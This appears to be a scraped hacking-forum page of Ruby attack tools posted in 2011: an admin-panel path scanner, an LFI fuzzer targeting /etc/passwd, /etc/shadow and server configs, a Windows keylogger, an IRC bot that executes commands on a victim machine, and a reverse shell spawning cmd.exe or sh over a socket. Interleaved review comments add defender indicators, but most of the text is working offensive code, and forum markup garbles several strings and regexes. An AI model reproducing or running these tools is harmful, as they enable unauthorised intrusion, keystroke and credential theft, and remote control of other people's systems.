    5. panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','control
panel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts
/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    6.  
    7. require 'net/http'
    8.  
    9.  
    10. def uso
    11.   print "\n<ul class="bbc_list"><li type="square"> panelcontol.rb <site>\n"[/li][/list]
    12. end
    13.  
    14. def toma(web)
    15.    return Net::HTTP.get_response(web)
    16.    end
    17.  
    18.  
    # Request web + "/" + panel for every entry in panels and print the ones
    # answered with a 2xx response (Net::HTTPSuccess). Any exception raised by
    # a request ends the whole program through copyright().
    #
    # NOTE(review): in access logs this is a fast run of GETs for administrative
    # paths from a single client, most of them answered 404. A 2xx here means
    # only that the path exists; whether the panel is protected depends on its
    # authentication, which is why such panels are better kept behind an
    # allow-list or VPN than hidden by an unusual path.
    # NOTE(review): the list markup around the first print string is forum
    # rendering residue that replaced a bracketed marker; it is not program text.
    19. def scan(web,panels)
    20.   print "\n</li><li type="square"> Starting the scan...\n\n\n"[/li][/list]
    21.   panels.each do |panel|
    22.   begin
    23.   begin
    24.   code = toma(URI.parse(web+"/"+panel))
    25.   rescue
    26.   copyright()
    27.   end
    28.   case code
    29.   when Net::HTTPSuccess
    30.   print "[Link] : "+web+"/"+panel+"\n"
    31. end
    32. end
    33. end
    34. end
    35.  
    # Prints the program banner.
    36. def head()
    37.   print "\n\n -- == Panel Control == --\n\n"
    38. end
    39.  
    # Prints the author notice and terminates the process with exit status 1,
    # including on a normal finish.
    40. def copyright()
    41.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    42.    exit(1)
    43.  end
    44.  
    # Entry point: banner, then usage when no site argument was given, otherwise
    # a scan of ARGV[0] against the `panels` list defined earlier in the script.
    # copyright() runs last and exits.
    45. head()
    46. if !ARGV[0]
    47.   uso()
    48. else
    49.   scan(ARGV[0],panels)  
    50. end
    51. copyright()
    52.  
    53.  

    390
    Ruby / [Ruby] LFI T00l
    « en: Julio 03, 2011, 09:32:22 pm »
    Un scanner de LFI

    Código: Ruby
    1. #!usr/bin/ruby
    2. #LFI tool (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. require 'net/http'
    6.  
    7.  
    # Prints the one-line usage message for the script.
    # NOTE(review): the `<ul ...><li ...>` prefix and `[/li][/list]` suffix look
    # like forum BBCode rendering artifacts, not part of the original string.
    8. def uso
    9.   print "\n<ul class="bbc_list"><li type="square"> lfi.rb <site>\n"[/li][/list]
    10. end
    11.  
    # Fetches `path` from `host` over plain HTTP on the hard-coded port 80 and
    # returns the response body as a string; the status code is not examined.
    12. def toma(host,path)
    13.   http = Net::HTTP.new(host,80)
    14.   return http.get(path).body
    15. end
    16.  
    # Appends each entry of `files` to the query string of `web`, requests it, and
    # prints the URL whenever the body does NOT contain PHP's
    # "No such file or directory in" warning.
    # The only signal is the absence of that warning, so any other answer (a
    # custom error page, a 404, a filtered request) is printed as a hit; a printed
    # link is not evidence that a file was read.
    # The `begin` has no `rescue`, so a request error propagates to the caller.
    # Defender view: the list is made of OS account files, web-server and database
    # configuration files and server logs. Query parameters carrying absolute
    # paths or ../ sequences are a dependable log and WAF signature. The fix
    # belongs at the include site: map the parameter to an allowlist of known
    # files, confine PHP with open_basedir, and keep display_errors off.
    17. def fuzz(web)
    18. files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log
','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
    19.  files.each do |file|
    20. begin
    21.  url = URI.parse(web)
    22.  code = toma(url.host,url.path+"?"+url.query+file)
    23.  if not code=~/No such file or directory in/
    24.    print "[Link] : "+web+file+"\n"
    25.  end
    26.  end
    27. end
    28. end
    29.  
    30.  
    # Probes `web` by appending a single quote to its query string and looking for
    # PHP's "No such file or directory in" warning in the response body.
    # When the warning is present it prints the text between
    # "No such file or directory in <b>" and "</b> on line" (the server-side script
    # path echoed by the warning), runs fuzz(web), and exits through copyright().
    # Otherwise it prints the "Not Vulnerable" line.
    # The `begin` has no `rescue`; a URL without a query string makes url.query nil
    # and the string concatenation raises.
    # Defender view: both the detection and the path disclosure depend on PHP
    # error text reaching the client. Turning display_errors off removes that
    # signal but not the flaw; the include itself must only accept values from a
    # fixed allowlist.
    31. def scan(web)
    32.   print "\n</li><li type="square"> Testing the vulnerability LFI...\n\n"[/li][/list]
    33.   begin
    34.   url = URI.parse(web)
    35.   code = toma(url.host,url.path+"?"+url.query+"'")
    36.   if code=~/No such file or directory in/
    37.    saca = code.split("No such file or directory in <b>")
    38.    saca = saca[1].split("<\/b> on line")
    39.    print "</li><li type="square"> LFI Detected\n\n"[/li][/list]
    40.    print "[Full Path Discloure]: "+saca[0]+"\n"
    41.    print "\n\n</li><li type="square"> Fuzzing Files\n\n"[/li][/list]
    42.    fuzz(web)
    43.    print "\n</li><li type="square"> Finish\n"[/li][/list]
    44.   copyright()
    45.   else
    46.     print "[-] Not Vulnerable to LFI\n\n"
    47. end
    48. end
    49. end
    50.  
    # Prints the program banner.
    51. def head()
    52.   print "\n\n -- == LFI tOOL == --\n\n"
    53. end
    54.  
    # Prints the author notice and terminates the process with exit status 1.
    55. def copyright()
    56.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    57.    exit(1)
    58.  end
    59.  
    # Entry point: banner, then usage when no URL argument was given, otherwise
    # scan(ARGV[0]). copyright() runs last and exits.
    60. head()
    61. if !ARGV[0]
    62.   uso()
    63. else
    64.   scan(ARGV[0])  
    65. end
    66. copyright()
    67.  

    391
    Ruby / [Ruby] Simple Keylogger
    « en: Julio 03, 2011, 09:32:00 pm »
    Un simple keylogger en Ruby

    Código: Ruby
    1. #!usr/bin/ruby
    2. #Simple Keylogger in Ruby
    3. #(C) Doddy Hackman 2011
    4.  
    5. require 'Win32API'
    6.  
    # Opens `filename` in append mode and writes `text` followed by a newline.
    # The file is opened on every call and no close is issued in this function.
    7. def savefile(filename,text)
    8. files = File.open(filename,'a')
    9. files.puts text+"\n"
    10. end
    11.  
    12. def capturar
    13.  
    14. nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i")
    15.  
    16. while 1
    17.  
    18. for num1 in (0x30..0x39) #numbers
    19. if nave.call(num1) & 0x01 == 1
    20. savefile("logs.txt",num1.chr())
    21. end
    22. end
    23.  
    24. for num2 in (0x41..0x5A) #letters
    25. if nave.call(num2) & 0x01 == 1
    26. savefile("logs.txt",num2.chr())
    27. end
    28. end
    29. end  
    30. end
    31.  
    32. capturar() #Start the keylogger
    33.  
    34. # ¿ The End ?
    35.  

    392
    Ruby / [Ruby] IRC Bot
    « en: Julio 03, 2011, 09:31:41 pm »
    Hola a todos

    Acabo de hacer un simple bot para IRC , el bot se
    conecta en la maquina ejecutante (victima) con un nombre
    marcado por ustedes , entonces con solo poner

    cmdnow :TU COMANDO:

    Recibiran en el mismo chat un mensaje con el resultado del comando puesto

    El codigo es el siguiente

    Código: Ruby
    1. #!usr/bin/ruby
    2. #IRC Bot (C) Doddy Hackman 2011
    3.  
    # Connection settings are fixed here; the script never reads ARGV, although
    # the usage text in uso() describes command-line arguments.
    4. host = "localhost"
    5. canal = "#locos"
    6. botname = "aa"
    7.  
    # Prints the program banner.
    8. def head()
    9. print "\n\n == -- IRC BOT -- ==\n\n"
    10. end
    11.  
    # Prints a usage line built from the script name ($0). Nothing in this listing
    # calls it.
    # NOTE(review): the `<ul ...><li ...>` prefix and `[/li][/list]` suffix look
    # like forum BBCode rendering artifacts, not part of the original string.
    12. def uso()
    13. print "\n<ul class="bbc_list"><li type="square"> Sintax : #{$0} <host> <channel> <bot name>\n"[/li][/list]
    14. end
    15.  
    # Prints the author notice; unlike the other scripts on this page it does not
    # call exit.
    16. def copyright()
    17. print "\n\n(C) Doddy Hackman 2011\n\n"
    18. end
    19.  
    # Connects to `host` on TCP port 6667, sends NICK/USER for `botname`, joins
    # `canal`, then loops forever reading up to 666 bytes at a time. It answers
    # PING with PONG, and when a received chunk matches the "cmdnow" pattern it
    # hands the captured text to IO.popen and sends the output (newlines replaced
    # by "|") back as a PRIVMSG. The reply target is the literal "#locos", not
    # `canal`.
    # NOTE(review): the patterns on listing lines 40 and 45 contain an <img ...>
    # tag inserted by the forum's smiley rendering; they are not the original
    # regular expressions.
    # NOTE(review): TCPSocket is used but no `require 'socket'` appears in this
    # listing.
    # Defender view: the command text is taken straight from the IRC stream with
    # no check of who sent it, so anyone able to post in the channel controls the
    # host running this. Indicators are cleartext NICK/USER/JOIN traffic to port
    # 6667 from a machine with no reason to use IRC, and an interpreter process
    # spawning child commands. Egress filtering and process-lineage alerting
    # cover both.
    20. def load(host,canal,botname)
    21. begin
    22. irc = TCPSocket.open(host,6667)
    23. rescue
    24. print "\n\n[-] Error\n\n"
    25. else
    26. irc.print "NICK #{botname}\r\n"
    27. irc.print "USER #{botname} 1 1 1 1\r\n"
    28. irc.print "JOIN #{canal}\r\n"
    29.  
    30. print "\n\n</li><li type="square"> Online\n\n"[/li][/list]
    31.  
    32. while 1
    33.  
    34. code = irc.recv(666)  
    35.  
    36. if (code=~/PING (.*)/)
    37. irc.print "PONG #{$1}\n"
    38. end
    39.  
    40. #if code=~/:(.*)!(.*)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*)/
    41. #print "Un tal : #{$1}\n"
    42. #print "Dijo : #{$3}\n"
    43. #end
    44.  
    45. if code=~/cmdnow <img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*):/
    46. re = IO.popen($1).read
    47. re = re.gsub("\n","|")
    48. irc.print "PRIVMSG #locos : ",re,"\r\n"  
    49. end
    50. end
    51. end
    52. end
    53.  
    # Entry point: banner, then load() with the hard-coded settings. load() loops
    # forever once connected, so copyright() is reached only when the connection
    # attempt fails.
    54. head()
    55. load(host,canal,botname)
    56. copyright()
    57.  
    58.  
    59. # ¿ The End ?
    60.  

    393
    Ruby / [Ruby] BackShell
    « en: Julio 03, 2011, 09:31:27 pm »
    Un reverse shell en ruby

    Código: Ruby
    1. #!usr/bin/ruby
    2. #Back Shell (C) Doddy HAckman 2010
    3. #Creditos : protos por darle vida a un lenguaje casi olvidado  en este mundo
    4.  
    5. require 'socket'
    6.  
    # Remote address and port are taken from the command line unvalidated;
    # both are nil when the argument is missing.
    7. ip = ARGV[0]
    8. port = ARGV[1]
    9.  
    # Prints the one-line usage message.
    # NOTE(review): the `<ul ...><li ...>` prefix and `[/li][/list]` suffix look
    # like forum BBCode rendering artifacts, not part of the original string.
    10. def uso
    11.   print "\n<ul class="bbc_list"><li type="square"> bind.rb <ip> <port>\n"[/li][/list]
    12. end
    13.  
    # Prints the program banner. Nothing in this listing calls it; now() prints
    # the same text itself.
    14. def  head
    15.   print "\n\n-- == ReverseShell By Doddy H == --\n\n"
    16. end
    17.  
    # Prints the author notice. Nothing in this listing calls it.
    18. def copyright
    19.   print "\n\n(C) Doddy Hackman 2010\n\n"
    20. end
    21.  
    22.  
    # Runs `net user` through system(); called from now() on the Windows branch,
    # after standard output has been redirected.
    23. def infowin
    24.   system("net user")
    25. end
    26.  
    # Starts cmd.exe through system(); the child inherits the standard streams
    # that now() has already reopened onto the socket.
    27. def openwin()
    28.  system("cmd.exe")
    29.  end  
    30.  
    # Runs `uname -a` through system(); called from now() on the non-Windows
    # branch, after standard output has been redirected.
    31.  def infolin
    32.   system("uname -a")
    33. end
    34.  
    # Sets TERM and execs an interactive `sh -i` through system(); the child
    # inherits the standard streams that now() has already reopened onto the socket.
    35. def openlin()
    36.  system("export TERM=xterm;exec sh -i")
    37.  end  
    38.  
    # Prints the banner, opens an outbound TCP connection to ip:port and reopens
    # $stdout and $stdin onto that socket ($stderr is left untouched). On any
    # error it prints a message and exits with status 1. It then picks a branch
    # by matching RUBY_PLATFORM against /win/ and runs the information command
    # followed by the shell for that branch.
    # Defender view: the result is a command interpreter (cmd.exe or sh -i) whose
    # parent is a ruby process and whose standard input and output are an
    # outbound network socket. That parent/child relationship combined with a
    # socket-backed stdio is what EDR reverse-shell rules key on. Default-deny
    # egress from servers limits where such a connection can go.
    39. def now(ip,port)
    40.   print "\n\n-- == ReverseShell By Doddy H == --\n\n"
    41.   print "\n</li><li type="square"> Ok , enter to the system\n\n"[/li][/list]
    42.  begin
    43.  backdoor = TCPSocket.new(ip,port)
    44.   $stdout.reopen(backdoor)
    45.   $stdin.reopen(backdoor)
    46.   rescue
    47.   print "\n[-] Un puto error !!\n\n"
    48.   exit(1)  
    49.   end
    50.   if RUBY_PLATFORM =~/win/
    51.    infowin()
    52.    openwin()
    53.   else
    54.    infolin()
    55.    openlin()
    56. end
    57. end
    58.  
    59.  
    # Entry point: usage is shown only when both arguments are absent; in every
    # other case now() is called with whatever was supplied.
    60. if !ip and !port
    61.  uso()
    62. else
    63.   now(ip,port)
    64. end
    65.  
    66. #The End ???
    67.  
